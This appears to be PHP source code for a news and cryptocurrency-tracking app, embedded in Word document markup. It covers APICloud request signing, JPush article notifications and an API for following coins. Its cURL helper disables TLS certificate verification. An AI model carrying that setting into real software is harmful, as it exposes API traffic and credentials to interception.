    <w:p w14:paraId="775FA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B37C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160282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43F2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C2D6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html($url,$method='GET',$body=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A266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1855B6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ow = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B491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header = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D78D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Id: ".$config['appid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC29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X-APICloud-AppKey: ".sha1($config['appid']."UZ".$config['appkey']."UZ".$now).".".$now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B76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5744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curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F40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RL, $url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A6F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CUSTOMREQUEST, $method);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503D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array("X-HTTP-Method-Override: $method"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F24C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TTPHEADER , $httpheader);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02205D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PEER, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAA55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SSL_VERIFYHOST, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF7E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USERAGENT, $_SERVER['HTTP_USER_AGENT']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0296D8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AUTOREFERER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEBCC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POSTFIELDS, $body); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441BEE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TIMEOUT, 30); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA7C6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HEADER, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056CFB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setopt($curl, CURLOPT_RETURNTRANSFER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE13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talline = curl_exec($curl); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08719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url_errno($curl)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BE44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Errno'.curl_error($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295863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DB2D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url_close($curl); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7976F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otalline; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B29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274C3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_content($a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447560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strip_tags($a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6609AD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turn $a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C622C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641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ush(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FBD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702E23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push'] || $config['push'] == 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350DD4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EA04E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6FB50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hide']      =   1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425ABC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title']     =   ['&lt;&gt;',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF4C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weitoutiao']=   0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239EEF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ychannel'] =   ['in','1,2,3'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23498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push_time'] = empty($config['push_time']) ? 0 : $config['push_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578043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date('Y-m-d' , strtotime("-".$config['push_time']." day"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB945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create_time'] = $aidwhere['time'] = ['&gt; time',$time];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B44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where['aid'] = ['&lt;&gt;',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230893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redian']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B05B2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flags'] =   2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4499D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C322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 = Db::name('push')-&gt;where($aidwhere)-&gt;field('aid')-&gt;order('id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221FD6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aid as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A63CF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ida[] = $v['aid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A70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2544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id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD3B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id']    =   ['not in',$aida];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65828E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A4BC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Db::name('article')-&gt;where($where)-&gt;field('id,title,description,mychannel,create_time,content,video')-&gt;order('rand()')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EAD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content']    =   $post['description'] ? $post['description'] : $this-&gt;_content($post['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B80CD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 = config()['apicloud'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4748BB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lient = new JPush($config['app_key'], $config['master_secret']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6050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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26066A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 = $client-&gt;push();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F339C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setPlatform(['ios','android']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0CF0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ddAllAudience(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D651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androidNotification($post['content'], array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2897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 =&gt; $post['title'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323AB2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s' =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F08F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post['mychannel'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C70F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post['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAEDE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gt;  _imgUrl().$post['video'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E17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9002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16EBFF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ponse-&gt;iosNotification($post['title'], array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BF56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tras' =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25728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ychannel' =&gt;  $post['mychannel'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3615F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gt;  $post['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E117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ideo'     =&gt;  _imgUrl().$post['video'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A479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D00F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p>
    <w:p w14:paraId="66F0E2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response-&gt;options(['apns_production'=&gt;true]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42359E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response-&gt;send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFC6A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url['http_code']) &amp;&amp; $url['http_code'] == 200){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779A28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701ACF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post['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F947B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ype']   =   2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6288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platform']   =   0; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A0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ush')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB96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id:'.$post['id'].')'.$post['title'].'|msg_id:'.$url['body']['msg_id'].'|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推送成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE15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899EA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url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B79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22031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ConnectionException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DDE0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1807CD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catch (\JPush\Exceptions\APIRequestException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7503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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1E9F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3DE3E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700CAC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this-&gt;html('https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3139850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rl = json_decode($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1D6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url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B69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rl['status'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524A9A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ime']   =   time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13089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id']    =   $post['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8C14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push')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06C5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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推送成功，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟内生效</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4A9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27F3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推送失败！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ED7D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F3D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96F2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CD55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t;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5049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762008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app\api\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603D8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1CA0DC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Session;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62363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Request;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563D909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12E133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Auth as Auth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64710C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Qiniu\Storage\UploadManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED4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set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE2AB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infollow extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDB51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7C064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 = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADB0A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memberId = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103C8D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E1744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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>架构函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB0F0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F58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param Request $request Request</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522632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7D0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ccess public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D383B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5E3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Request $request = null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077295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EDCB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request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB283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 = input('param.token', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7CD0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token != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585C71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id = _decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D81D4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_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB16C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Id = $member_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12367C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member_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F544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member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E49B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1D39D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4F1236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08C54F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1491F7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3EC860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无法登录，原因是当前账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28220C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3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D376E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8CA2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30C3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1BB9C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556F41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283B25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007ED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4B29B3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当前账户正在审核中，请等待客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CF37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4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D923F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90D1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4B04A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7A1C1B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234AE5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 = _records($member['id'], 'API</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作，账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4FCE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cording) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA576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59CB8A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账户审核被拒绝，拒绝原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $member['hidetent'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708311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5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55E9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DF95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0125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40D6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1206F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746BB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62B26A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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该用户不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B9AB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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFF93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C8E9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BA3C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 = $member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066ADC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4C992A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2AF9DB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err' =&gt; 'Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7776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581B5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BD7AF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8471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500DF4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4262F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 =&gt; 'Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F1C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rrcode' =&gt; 222,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B99E9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9DBE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0B3C9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4B96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dex()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD7E6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7AC57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_ajaxError()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799DC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0A6D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192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lists </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取用户关注虚拟币列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC2E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获取用户关注虚拟币列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75637D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04C6C6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8B8E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Use MyPages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493305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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>必填</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456DA7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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABCB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quote     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>报价货币，必填，建议使用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>USDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F073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实时行情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C7C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exchange </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5A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symbol      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB985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update_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间日期，格式毫秒时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B78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last_price  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最新价格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7898C8B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hange      24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18582B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percentage  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动百分比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098FA1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base_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内基准货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663475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quote_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内报价货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05806E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icon </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币图标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1485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currency </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D46A7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8F1F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sts()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC6E2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DB6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Page');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD12D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32C766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26C6D5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0A7D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 = input('param.pages');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7126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quote = input('param.quote', 'USDT');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DEDF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this-&gt;memberId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5238E9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s_where['member_id'] = $member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C53C6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s=Db::name('member_coin')-&gt;order('create_time desc')-&gt;where($follows_where)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F38C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follows['data']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6775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follows);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1223D2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s_where['id'] = ['in', array_column($follows['data'], 'coin_id')];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0357E3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oins=Db::name('coin')-&gt;where($coins_where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD05B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coin=function($follow) use ($coins) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4505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dex=array_search($follow['coin_id'], array_column($coins, 'id'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE6B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alse===$index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CFF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ollow;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF07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5B54C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ollow + $coins[$index];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174492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A9CE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s['data']=array_map($attach_coin, $follows['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5966B6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rr = array_column($coins, 'currency');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547998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_merge = function ($base) use ($quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D1E3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base/$quote";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0EBE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A31F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 = array_map($symbol_merge, $arr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F70A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e_query=Db::name('ticker')-&gt;field('batch_no')-&gt;order('ticker_timestamp desc')-&gt;limit(1)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4D4C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exchange'] = $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166BF0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symbol'] = ['in', $symbol];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E72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_where['batch_no'] = $pre_query['batch_no'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5E3A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s=Db::name('ticker')-&gt;order('ticker_timestamp desc')-&gt;where($ticker_where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE985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icon=function($coin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A87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icon']= config()['appConfig']['prod_url'].'/public/coin/icon/' . strtolower($coin['currency']) . '@2x.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C144C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B715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7C923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s['data']=array_map($attach_icon, $follows['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A54DF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ttach_ticker=function($coin) use ($tickers, $quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4508AA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coin['currency'] . '/' .$quote;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78903B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cker=array_search($symbol, array_column($tickers, 'symbol'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5056CF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false===$ticker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5BB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symbol'=&gt;$symbol, 'last_price'=&gt;0, 'change'=&gt;0, 'percentage'=&gt;0, 'base_volume'=&gt;0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33193D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A4C11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coin + $tickers[$ticker];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03500E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5BEF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llows['data']=array_map($attach_ticker, $follows['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F04C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follows);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65462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D46F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6D3F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follow </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员关注虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF60A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会员关注虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1604BF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4F2EC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02142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70341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coin_id  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F9F4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A1E82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follow()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88B4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A739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_id=input('param.coin_id') ? input('param.coin_id') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FAF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 = Db::name('coin')-&gt;where('id', input('param.coin_id'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506114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in) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37628F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member = _user($this-&gt;memberId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B19C8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 Db::name('member_coin')-&gt;where('member_id', $member['id'])-&gt;where('coin_id', $coin['id'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073BC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t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF552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coin = ['member_id' =&gt; $member['id'], 'coin_id' =&gt; $coin['id'], 'create_time' =&gt; time()];</w:t>
      </w:r>
    </w:p>
